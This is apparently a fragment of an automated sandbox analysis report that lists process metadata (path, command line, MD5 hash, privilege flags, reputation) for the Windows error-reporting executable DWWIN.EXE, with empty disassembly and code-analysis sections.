                                                                                                                                      Analysis Process: DWWIN.EXE PID: 1296 Parent PID: 2448

                                                                                                                                      General

                                                                                                                                      Start time:01:44:04
                                                                                                                                      Start date:12/01/2021
                                                                                                                                      Path:C:\Windows\System32\DWWIN.EXE
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\dwwin.exe -x -s 1840
                                                                                                                                      Imagebase:0xffeb0000
                                                                                                                                      File size:152576 bytes
                                                                                                                                      MD5 hash:25247E3C4E7A7A73BAEEA6C0008952B1
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:moderate

                                                                                                                                      Disassembly

                                                                                                                                      Code Analysis

                                                                                                                                      Reset < >